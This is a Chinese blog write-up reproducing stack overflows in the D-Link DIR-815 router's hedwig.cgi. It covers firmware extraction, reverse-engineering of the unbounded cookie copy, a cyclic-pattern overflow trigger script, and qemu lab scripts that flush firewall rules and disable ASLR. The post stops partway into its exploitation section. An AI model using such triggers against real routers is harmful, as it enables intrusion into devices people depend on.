<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>D-Link DIR-815 路由器多次栈溢出漏洞复现 (CNVD-2013-11625) | X1NRI</title>
  <meta name="author" content="X1NRI">
  
  <meta name="description" content="初探物联网">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="D-Link DIR-815 路由器多次栈溢出漏洞复现 (CNVD-2013-11625)"/>
  <meta property="og:site_name" content="X1NRI"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="X1NRI" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>






<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">X1NRI</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/links" title="Subscribe me.">
			  <i class="fa fa-chain"></i>Links
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> D-Link DIR-815 路由器多次栈溢出漏洞复现 (CNVD-2013-11625)</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  
		 <div class="alert alert-success description">
			<i class="fa fa-info-circle"></i> 初探物联网
		 </div> <!-- alert -->
	  		

	  <blockquote>
<p>D-Link DIR-645 “post_login.xml”，”hedwig.cgi”，”authentication.cgi”不正确过滤用户提交的参数数据，允许远程攻击者利用漏洞提交特制请求触发缓冲区溢出，可使应用程序停止响应，造成拒绝服务攻击。<a target="_blank" rel="noopener" href="https://www.cnvd.org.cn/flaw/show/CNVD-2013-11625">国家信息安全漏洞共享平台 (cnvd.org.cn)</a><br>参考文章：<a target="_blank" rel="noopener" href="https://bbs.kanxue.com/thread-272318.htm#msg_header_h2_0">[原创] 从零开始复现 DIR-815 栈溢出漏洞-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com</a></p>
</blockquote>
<p><img src="/RW_FILE/af921f3877f0ac8864d8603513ea3495_MD5.jpeg"></p>
<h1 id="一、漏洞分析"><a href="#一、漏洞分析" class="headerlink" title="一、漏洞分析"></a>一、漏洞分析</h1><h2 id="固件解压"><a href="#固件解压" class="headerlink" title="固件解压"></a>固件解压</h2><p>先解压固件，但是出现问题，似乎是因为在提取文件时，有符号链接（symlink）指向了提取目录之外的位置。出于安全考虑binwalk会将所有链接置为&#x2F;dev&#x2F;null，因为这样的链接可能会导致提取过程访问到敏感或不相关的文件系统部分：</p>
<pre class="line-numbers language-text" data-language="text"><code class="language-text">WARNING: Symlink points outside of the extraction directory: /home/iot/dir-815/_DIR-815A1_FW101SSB03.bin.extracted/squashfs-root/tmp -> /var/tmp; changing link target to /dev/null for security purposes.<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>解决办法是添加参数<code>--preserve-symlinks</code>：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">iot@iot-virtual-machine:~/dir-815$ binwalk --preserve-symlinks <span class="token parameter variable">-Me</span> ./DIR-815A1_FW101SSB03.bin <span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>根据官方提示，漏洞存在于<code>hedwig.cgi</code>中</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">iot@iot-virtual-machine:~/dir-815/_DIR-815A1_FW101SSB03.bin.extracted/squashfs-root$ <span class="token function">find</span> ./ <span class="token parameter variable">-name</span> <span class="token string">'hedwig.cgi'</span> <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null
./htdocs/web/hedwig.cgi

iot@iot-virtual-machine:~/dir-815/_DIR-815A1_FW101SSB03.bin.extracted/squashfs-root$ <span class="token function">file</span> ./htdocs/web/hedwig.cgi
./htdocs/web/hedwig.cgi: broken symbolic <span class="token function">link</span> to /htdocs/cgibin

iot@iot-virtual-machine:~/dir-815/_DIR-815A1_FW101SSB03.bin.extracted/squashfs-root$ <span class="token function">file</span> ./htdocs/cgibin
./htdocs/cgibin: ELF <span class="token number">32</span>-bit LSB executable, MIPS, MIPS32 version <span class="token number">1</span> <span class="token punctuation">(</span>SYSV<span class="token punctuation">)</span>, dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>可以看见，<code>/htdocs/web/hedwig.cgi</code>是<code>/htdocs/cgibin</code>的软链接，因此，我们需要逆向分析的二进制文件是<code>/htdocs/cgibin</code>，它是一个MIPS32的小端序程序。</p>
<p>值得一提的是，这里的所有.cgi都指向一个文件：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">iot@iot-virtual-machine:~/dir-815/_DIR-815A1_FW101SSB03.bin.extracted/squashfs-root$ <span class="token function">ls</span> <span class="token parameter variable">-l</span> <span class="token variable"><span class="token variable">`</span><span class="token function">find</span> ./ <span class="token parameter variable">-name</span> <span class="token string">"*.cgi"</span> <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null<span class="token variable">`</span></span>
lrwxrwxrwx <span class="token number">1</span> iot iot <span class="token number">14</span>  <span class="token number">3</span>月 <span class="token number">26</span> <span class="token number">18</span>:05 ./htdocs/web/captcha.cgi -<span class="token operator">></span> /htdocs/cgibin
lrwxrwxrwx <span class="token number">1</span> iot iot <span class="token number">14</span>  <span class="token number">3</span>月 <span class="token number">26</span> <span class="token number">18</span>:05 ./htdocs/web/conntrack.cgi -<span class="token operator">></span> /htdocs/cgibin
lrwxrwxrwx <span class="token number">1</span> iot iot <span class="token number">14</span>  <span class="token number">3</span>月 <span class="token number">26</span> <span class="token number">18</span>:05 ./htdocs/web/dlcfg.cgi -<span class="token operator">></span> /htdocs/cgibin
lrwxrwxrwx <span class="token number">1</span> iot iot <span class="token number">14</span>  <span class="token number">3</span>月 <span class="token number">26</span> <span class="token number">18</span>:05 ./htdocs/web/fwup.cgi -<span class="token operator">></span> /htdocs/cgibin
lrwxrwxrwx <span class="token number">1</span> iot iot <span class="token number">14</span>  <span class="token number">3</span>月 <span class="token number">26</span> <span class="token number">18</span>:05 ./htdocs/web/hedwig.cgi -<span class="token operator">></span> /htdocs/cgibin
lrwxrwxrwx <span class="token number">1</span> iot iot <span class="token number">14</span>  <span class="token number">3</span>月 <span class="token number">26</span> <span class="token number">18</span>:05 ./htdocs/web/pigwidgeon.cgi -<span class="token operator">></span> /htdocs/cgibin
lrwxrwxrwx <span class="token number">1</span> iot iot <span class="token number">14</span>  <span class="token number">3</span>月 <span class="token number">26</span> <span class="token number">18</span>:05 ./htdocs/web/seama.cgi -<span class="token operator">></span> /htdocs/cgibin
lrwxrwxrwx <span class="token number">1</span> iot iot <span class="token number">14</span>  <span class="token number">3</span>月 <span class="token number">26</span> <span class="token number">18</span>:05 ./htdocs/web/service.cgi -<span class="token operator">></span> /htdocs/cgibin<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="逆向分析"><a href="#逆向分析" class="headerlink" title="逆向分析"></a>逆向分析</h2><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">iot@iot-virtual-machine:~/dir-815/_DIR-815A1_FW101SSB03.bin.extracted/squashfs-root$ checksec ./htdocs/cgibin
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> <span class="token string">'/home/iot/dir-815/_DIR-815A1_FW101SSB03.bin.extracted/squashfs-root/htdocs/cgibin'</span>
    Arch:     mips-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE <span class="token punctuation">(</span>0x400000<span class="token punctuation">)</span>
    Stack:    Executable
    RWX:      Has RWX segments<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>啥保护都没有</p>
<p>进到 main 函数，我们关注<code>hedwigcgi_main()</code> ：<br><img src="/RW_FILE/5e602bb78993b47862201e5c751c7c9f_MD5.jpeg"><br>进到<code>hedwigcgi_main()</code>：</p>
<ul>
<li><p>首先会读取环境变量<code>$REQUEST_METHOD</code>，并且必须是<code>POST</code>请求。<br><img src="/RW_FILE/58db2b09769f2f66c6af74550ba33528_MD5.jpeg"></p>
</li>
<li><p>接下来进入到<code>cgibin_parse_request()</code><br><img src="/RW_FILE/a87b6f9e99c7156708546d20e4a98f38_MD5.jpeg"><br>这个函数的功能是对URL进行解析，</p>
</li>
</ul>
<p>注意这里会获取几个环境变量，虽然跟漏洞关系不大但是不能没有<br><img src="/RW_FILE/2d09bad30bbab99c49f92069e26a8559_MD5.jpeg"></p>
<ul>
<li>接下来进入<code>sess_get_uid()</code><br>将cookie中key为“uid”的value值筛选出来，并附加到a1尾部<br><img src="/RW_FILE/d90fe6d28d8cfe6657f25caeb8bd1720_MD5.jpeg"></li>
</ul>
<p>我们回到主函数，可以看到value值赋给了v4，v4又赋给了string，并通过<code>sprintf()</code>复制给变量v27；但是value的长度并没有限制，存在栈溢出漏洞<br><img src="/RW_FILE/7cbcfa599c2d75525c300d37ffdd5fbd_MD5.jpeg"></p>
<p>还没完，在主函数最后又用进行了一次复制，v4的值在中途没有改变，存在第二次栈溢出<br><img src="/RW_FILE/bb9d35ae70d8b07da576877b70c15ba6_MD5.jpeg"></p>
<hr>
<p>回过头来看，要达到溢出点有几个条件判断：</p>
<ol>
<li>需要打开<code>/var/tmp/temp.xml</code>文件，在真机上是存在&#x2F;var&#x2F;tmp文件夹的，所以我们需要手动创建<br><img src="/RW_FILE/04265fc3a449a4630f77bb7256f1539e_MD5.jpeg"></li>
<li>这里有一个flag位，需要非空：<br><img src="/RW_FILE/f4b0d1129fe7917b512c9d6156112b7a_MD5.jpeg"><br>交叉引用发现其在<code>sub_409A6C()</code>中被赋值<br><img src="/RW_FILE/0b307934ea0b33a01b01e619e1dd12e5_MD5.jpeg"><br>再交叉引用，其地址是作为<code>cgibin_parse_request()</code>的一个参数<br><img src="/RW_FILE/e5d853319ce46599ccf0cccc20efd5b3_MD5.jpeg"></li>
</ol>
<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><h2 id="qemu-用户模式复现"><a href="#qemu-用户模式复现" class="headerlink" title="qemu 用户模式复现"></a>qemu 用户模式复现</h2><p>首先<code>cyclic 2000 &gt; payload</code>，将生成的<code>2000</code>个字符存放到<code>payload</code>文件中，再用以下<code>shell</code>脚本：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>
 
<span class="token assign-left variable">INPUT</span><span class="token operator">=</span><span class="token string">"winmt=pwner"</span>
<span class="token assign-left variable">LEN</span><span class="token operator">=</span><span class="token variable"><span class="token variable">$(</span><span class="token builtin class-name">echo</span> <span class="token parameter variable">-n</span> <span class="token string">"<span class="token variable">$INPUT</span>"</span> <span class="token operator">|</span> <span class="token function">wc</span> <span class="token parameter variable">-c</span><span class="token variable">)</span></span>
<span class="token assign-left variable">cookie</span><span class="token operator">=</span><span class="token string">"uid=<span class="token variable"><span class="token variable">`</span><span class="token function">cat</span> payload<span class="token variable">`</span></span>"</span>
 
<span class="token builtin class-name">echo</span> <span class="token variable">$INPUT</span> <span class="token operator">|</span> qemu-mipsel <span class="token parameter variable">-L</span> ./ <span class="token parameter variable">-0</span> <span class="token string">"hedwig.cgi"</span> <span class="token parameter variable">-E</span> <span class="token assign-left variable">REQUEST_METHOD</span><span class="token operator">=</span><span class="token string">"POST"</span> <span class="token parameter variable">-E</span> <span class="token assign-left variable">CONTENT_LENGTH</span><span class="token operator">=</span><span class="token variable">$LEN</span> <span class="token parameter variable">-E</span> <span class="token assign-left variable">CONTENT_TYPE</span><span class="token operator">=</span><span class="token string">"application/x-www-form-urlencoded"</span> <span class="token parameter variable">-E</span> <span class="token assign-left variable">HTTP_COOKIE</span><span class="token operator">=</span><span class="token variable">$cookie</span> <span class="token parameter variable">-E</span> <span class="token assign-left variable">REQUEST_URI</span><span class="token operator">=</span><span class="token string">"2333"</span> <span class="token parameter variable">-g</span> <span class="token number">1234</span> ./htdocs/cgibin<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><code>echo -n</code>表示输出不添加换行符，<code>wc -c</code>用来接收上一个echo命令中接收到的字符数，所以变量<code>LEN</code>是计算变量<code>INPUT</code>的长度</p>
<p><code>echo $INPUT | qemu-mipsel ...</code>立刻输出返回的信息</p>
<ul>
<li><code>-L</code>：设置ELF文件运行目录 </li>
<li><code>-0</code>：强制更改目标进程的<code>argv[0]</code>（<code>argv[0]</code>存储着程序的名称）</li>
<li><code>-E</code>：设置环境变量，这里我们需要设置以下环境变量：<ul>
<li><code>REQUEST_METHOD</code>：指定为<code>POST</code></li>
<li><code>CONTENT_LENGTH</code>：发送数据的长度，这个需要我们传入</li>
<li><code>CONTENT_TYPE</code>：通常为<code>application/x-www-form-urlencoded</code>，意思是是表单</li>
<li><code>HTTP_COOKIE</code>：发送的cookie值，这个需要我们传入，也是栈溢出发生的位置</li>
<li><code>REQUEST_URI</code>：当前请求的原始URL，这个随便</li>
</ul>
</li>
<li><code>-g</code>：等待gdb连接到端口</li>
</ul>
<h2 id="qemu-系统模式复现"><a href="#qemu-系统模式复现" class="headerlink" title="qemu 系统模式复现"></a>qemu 系统模式复现</h2><p>用qemu的系统模式模拟的环境比起用qemu的用户模式模拟的环境要更加真实</p>
<h3 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h3><p>事先安装依赖库</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">sudo</span> <span class="token function">apt-get</span> <span class="token function">install</span> bridge-utils uml-utilities<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="1-启动qemu"><a href="#1-启动qemu" class="headerlink" title="1.启动qemu"></a>1.启动qemu</h4><p>要使用qemu-system-mipsel从系统角度进行模拟，就需要mips架构的内核镜像和文件系统。可以在如下网站下载：<a target="_blank" rel="noopener" href="https://people.debian.org/~aurel32/qemu/">Index of &#x2F;~aurel32&#x2F;qemu (debian.org)</a></p>
<p>我们需要的是小端序，选择mipsel，下载文件系统和内核镜像：<br><img src="/RW_FILE/3ddb1fd9dbc3f379fdb36cd1188dfb80_MD5.jpeg"></p>
<p>配置qemu启动脚本：</p>
<pre class="line-numbers language-bash" data-language="bash"><div class="caption"><span>TI:"start.sh"</span></div><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>

<span class="token function">sudo</span> qemu-system-mipsel <span class="token punctuation">\</span>
	<span class="token parameter variable">-kernel</span> ~/Public/mipsel/vmlinux-3.2.0-4-4kc-malta <span class="token punctuation">\</span>
	<span class="token parameter variable">-hda</span> ~/Public/mipsel/debian_squeeze_mipsel_standard.qcow2 <span class="token punctuation">\</span>
	<span class="token parameter variable">-append</span> <span class="token string">"root=/dev/sda1 console=ttyS0"</span> <span class="token punctuation">\</span>
	<span class="token parameter variable">-net</span> nic <span class="token punctuation">\</span>
	<span class="token parameter variable">-net</span> tap <span class="token punctuation">\</span>
	<span class="token parameter variable">-nographic</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>可以使用<code>user:user</code>或<code>root:root</code>登录，要退出qemu模拟，则使用快捷键<code>ctrl+a</code>再按<code>x</code></p>
<h4 id="2-实现qemu虚机-宿主机网络互通"><a href="#2-实现qemu虚机-宿主机网络互通" class="headerlink" title="2.实现qemu虚机&amp;宿主机网络互通"></a>2.实现qemu虚机&amp;宿主机网络互通</h4><p>在主机创建一个<code>net.sh</code>脚本，用来创建虚拟Tap接口，ip为 192.168.100.1&#x2F;24</p>
<pre class="line-numbers language-bash" data-language="bash"><div class="caption"><span>TI:"net.sh"</span></div><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>
<span class="token function">sudo</span> <span class="token function">sysctl</span> <span class="token parameter variable">-w</span> <span class="token assign-left variable">net.ipv4.ip_forward</span><span class="token operator">=</span><span class="token number">1</span>
<span class="token function">sudo</span> iptables <span class="token parameter variable">-F</span>
<span class="token function">sudo</span> iptables <span class="token parameter variable">-X</span>
<span class="token function">sudo</span> iptables <span class="token parameter variable">-t</span> nat <span class="token parameter variable">-F</span>
<span class="token function">sudo</span> iptables <span class="token parameter variable">-t</span> nat <span class="token parameter variable">-X</span>
<span class="token function">sudo</span> iptables <span class="token parameter variable">-t</span> mangle <span class="token parameter variable">-F</span>
<span class="token function">sudo</span> iptables <span class="token parameter variable">-t</span> mangle <span class="token parameter variable">-X</span>
<span class="token function">sudo</span> iptables <span class="token parameter variable">-P</span> INPUT ACCEPT
<span class="token function">sudo</span> iptables <span class="token parameter variable">-P</span> FORWARD ACCEPT
<span class="token function">sudo</span> iptables <span class="token parameter variable">-P</span> OUTPUT ACCEPT
<span class="token function">sudo</span> iptables <span class="token parameter variable">-t</span> nat <span class="token parameter variable">-A</span> POSTROUTING <span class="token parameter variable">-o</span> ens33 <span class="token parameter variable">-j</span> MASQUERADE
<span class="token function">sudo</span> iptables <span class="token parameter variable">-I</span> FORWARD <span class="token number">1</span> <span class="token parameter variable">-i</span> tap0 <span class="token parameter variable">-j</span> ACCEPT
<span class="token function">sudo</span> iptables <span class="token parameter variable">-I</span> FORWARD <span class="token number">1</span> <span class="token parameter variable">-o</span> tap0 <span class="token parameter variable">-m</span> state <span class="token parameter variable">--state</span> RELATED,ESTABLISHED <span class="token parameter variable">-j</span> ACCEPT
<span class="token function">sudo</span> <span class="token function">ifconfig</span> tap0 <span class="token number">192.168</span>.100.1/24 up
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>在qemu机配置虚拟网卡，ip为 192.168.100.2&#x2F;24</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">ifconfig</span> eth0 <span class="token number">192.168</span>.100.2/24 up<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="3-事前配置"><a href="#3-事前配置" class="headerlink" title="3.事前配置"></a>3.事前配置</h4><p>在把文件系统复制到qemu虚机之前，需要在squashfs-root&#x2F;下准备一些东西：</p>
<ol>
<li><p>gdbserver-mipsel<br>可以在 <a target="_blank" rel="noopener" href="https://github.com/rapid7/embedded-tools/tree/master/binaries/gdbserver">embedded-tools&#x2F;binaries&#x2F;gdbserver at master · rapid7&#x2F;embedded-tools (github.com)</a> 下载所需架构的gdbserver</p>
</li>
<li><p>init.sh &amp; fin.sh<br>创建<code>init.sh</code>的脚本进行初始化操作：</p>
</li>
</ol>
<pre class="line-numbers language-bash" data-language="bash"><div class="caption"><span>TI:"init.sh"</span></div><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>
<span class="token builtin class-name">echo</span> <span class="token number">0</span> <span class="token operator">></span> /proc/sys/kernel/randomize_va_space
<span class="token function">cp</span> http_conf /
<span class="token function">cp</span> sbin/httpd /
<span class="token function">cp</span> <span class="token parameter variable">-rf</span> htdocs/ /
<span class="token function">mkdir</span> /etc_bak
<span class="token function">cp</span> <span class="token parameter variable">-r</span> /etc /etc_bak
<span class="token function">rm</span> /etc/services
<span class="token function">cp</span> <span class="token parameter variable">-rf</span> etc/ /
<span class="token function">cp</span> lib/ld-uClibc-0.9.30.1.so  /lib/
<span class="token function">cp</span> lib/libcrypt-0.9.30.1.so  /lib/
<span class="token function">cp</span> lib/libc.so.0  /lib/
<span class="token function">cp</span> lib/libgcc_s.so.1  /lib/
<span class="token function">cp</span> lib/ld-uClibc.so.0  /lib/
<span class="token function">cp</span> lib/libcrypt.so.0  /lib/
<span class="token function">cp</span> lib/libgcc_s.so  /lib/
<span class="token function">cp</span> lib/libuClibc-0.9.30.1.so  /lib/
<span class="token builtin class-name">cd</span> /
<span class="token function">rm</span> <span class="token parameter variable">-rf</span> /htdocs/web/hedwig.cgi
<span class="token function">rm</span> <span class="token parameter variable">-rf</span> /usr/sbin/phpcgi
<span class="token function">rm</span> <span class="token parameter variable">-rf</span> /usr/sbin/hnap
<span class="token function">ln</span> <span class="token parameter variable">-s</span> /htdocs/cgibin /htdocs/web/hedwig.cgi
<span class="token function">ln</span> <span class="token parameter variable">-s</span> /htdocs/cgibin /usr/sbin/phpcgi
<span class="token function">ln</span> <span class="token parameter variable">-s</span>  /htdocs/cgibin /usr/sbin/hnap
./httpd <span class="token parameter variable">-f</span> ./http_conf<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这里<code>init.sh</code>脚本主要就是将一些要用的文件从我们解压出来的文件系统拷贝到下载的镜像文件的文件系统中。虽然可以用<code>chroot</code>直接改根目录，但是后面不仅需要挂载dev和proc目录，还有其他问题比如没有PID文件等，也比较麻烦。不如直接复制到根目录下。</p>
<p>因为真机没开ASLR，这里也直接关闭掉。</p>
<p>当然，在退出qemu虚拟机时，需要恢复&#x2F;etc文件夹，不然再次启动qemu时会失败，原因是因为改变了文件系统的内容。此时就只能使用新的文件系统。所以我们退出时记得运行<code>fin.sh</code>的脚本恢复<code>/etc</code>文件夹：</p>
<pre class="line-numbers language-bash" data-language="bash"><div class="caption"><span>TI:"fin.sh"</span></div><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>
<span class="token function">rm</span> <span class="token parameter variable">-rf</span> /etc
<span class="token function">mv</span> /etc_bak/ /etc<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>


<ol start="3">
<li>http_conf<blockquote>
<p>httpd.conf 是 Apache HTTP Server 的主配置文件，用于定义全局性质的配置项，包括日志、连接池大小等。</p>
</blockquote>
</li>
</ol>
<p>我们在squashfs-root&#x2F;目录下新建一个名为<code>http_conf</code>的文件</p>
<pre class="line-numbers language-http" data-language="http"><code class="language-http">Umask 026
PidFile /var/run/httpd.pid
LogGMT On  #开启log
ErrorLog /log #log文件
 
Tuning
&#123;
    NumConnections 15
    BufSize 12288
    InputBufSize 4096
    ScriptBufSize 4096
    NumHeaders 100
    Timeout 60
    ScriptTimeout 60
&#125;
 
Control
&#123;
    Types
    &#123;
        text/html    &#123; html htm &#125;
        text/xml    &#123; xml &#125;
        text/plain    &#123; txt &#125;
        image/gif    &#123; gif &#125;
        image/jpeg    &#123; jpg &#125;
        text/css    &#123; css &#125;
        application/octet-stream &#123; * &#125;
    &#125;
    Specials
    &#123;
        Dump        &#123; /dump &#125;
        CGI            &#123; cgi &#125;
        Imagemap    &#123; map &#125;
        Redirect    &#123; url &#125;
    &#125;
    External
    &#123;
        /usr/sbin/phpcgi &#123; php &#125;
    &#125;
&#125;
 
 
Server
&#123;
    ServerName "Linux, HTTP/1.1, "
    ServerId "8080"
    Family inet
    Interface eth0 #对应qemu仿真路由器系统的网卡
    Address 192.168.100.2 #qemu仿真路由器系统的IP
    Port "8888" #对应未被使用的端口
    Virtual
    &#123;
        AnyHost
        Control
        &#123;
            Alias /
            Location /htdocs/web
            IndexNames &#123; index.php &#125;
            External
            &#123;
                /usr/sbin/phpcgi &#123; router_info.xml &#125;
                /usr/sbin/phpcgi &#123; post_login.xml &#125;
            &#125;
        &#125;
        Control
        &#123;
            Alias /HNAP1
            Location /htdocs/HNAP1
            External
            &#123;
                /usr/sbin/hnap &#123; hnap &#125;
            &#125;
            IndexNames &#123; index.hnap &#125;
        &#125;
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


<h4 id="4-启动httpd服务"><a href="#4-启动httpd服务" class="headerlink" title="4.启动httpd服务"></a>4.启动httpd服务</h4><p>一切就绪，将文件系统上传到虚机</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">scp</span> <span class="token parameter variable">-r</span> squashfs-root/ root@192.168.100.2:~/ <span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>转到根目录，执行<code>init.sh</code>启动httpd服务：<br><img src="/RW_FILE/c0cad212c28242263b7827b296f232d9_MD5.jpeg"></p>
<p>运行<code>hedwig.cgi</code>，出现no request问题：<br><img src="/RW_FILE/8013e7a5a2b47025c6da47122d812c16_MD5.jpeg"><br>这里访问失败是因为hedwig.cgi服务没有收到请求，需要提前配置qemu虚拟环境中的<code>REQUEST_METHOD</code>等方法，因为httpd是读取的环境变量，这里就直接通过环境变量进行设置：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">export</span> <span class="token assign-left variable">CONTENT_LENGTH</span><span class="token operator">=</span><span class="token string">"100"</span>
<span class="token builtin class-name">export</span> <span class="token assign-left variable">CONTENT_TYPE</span><span class="token operator">=</span><span class="token string">"application/x-www-form-urlencoded"</span>
<span class="token builtin class-name">export</span> <span class="token assign-left variable">REQUEST_METHOD</span><span class="token operator">=</span><span class="token string">"POST"</span>
<span class="token builtin class-name">export</span> <span class="token assign-left variable">REQUEST_URI</span><span class="token operator">=</span><span class="token string">"/hedwig.cgi"</span>
<span class="token builtin class-name">export</span> <span class="token assign-left variable">HTTP_COOKIE</span><span class="token operator">=</span><span class="token string">"uid=1234"</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这里在qemu虚拟系统中运行hedwig.cgi，再次访问网址就能正常收到内容了<br><img src="/RW_FILE/54ce873fcc2979a58e8771149b52c3a5_MD5.jpeg"></p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><h4 id="①-将生成的payload传给qemu机（本地）"><a href="#①-将生成的payload传给qemu机（本地）" class="headerlink" title="① 将生成的payload传给qemu机（本地）"></a>① 将生成的payload传给qemu机（本地）</h4><p>这种方法不需要开启httpd，就是把生成的payload传给qemu虚拟机，然后在虚拟机中执行payload</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>
<span class="token builtin class-name">export</span> <span class="token assign-left variable">CONTENT_LENGTH</span><span class="token operator">=</span><span class="token string">"11"</span>
<span class="token builtin class-name">export</span> <span class="token assign-left variable">CONTENT_TYPE</span><span class="token operator">=</span><span class="token string">"application/x-www-form-urlencoded"</span>
<span class="token builtin class-name">export</span> <span class="token assign-left variable">HTTP_COOKIE</span><span class="token operator">=</span><span class="token string">"uid=<span class="token variable"><span class="token variable">`</span><span class="token function">cat</span> payload<span class="token variable">`</span></span>"</span>
<span class="token builtin class-name">export</span> <span class="token assign-left variable">REQUEST_METHOD</span><span class="token operator">=</span><span class="token string">"POST"</span>
<span class="token builtin class-name">export</span> <span class="token assign-left variable">REQUEST_URI</span><span class="token operator">=</span><span class="token string">"2333"</span>
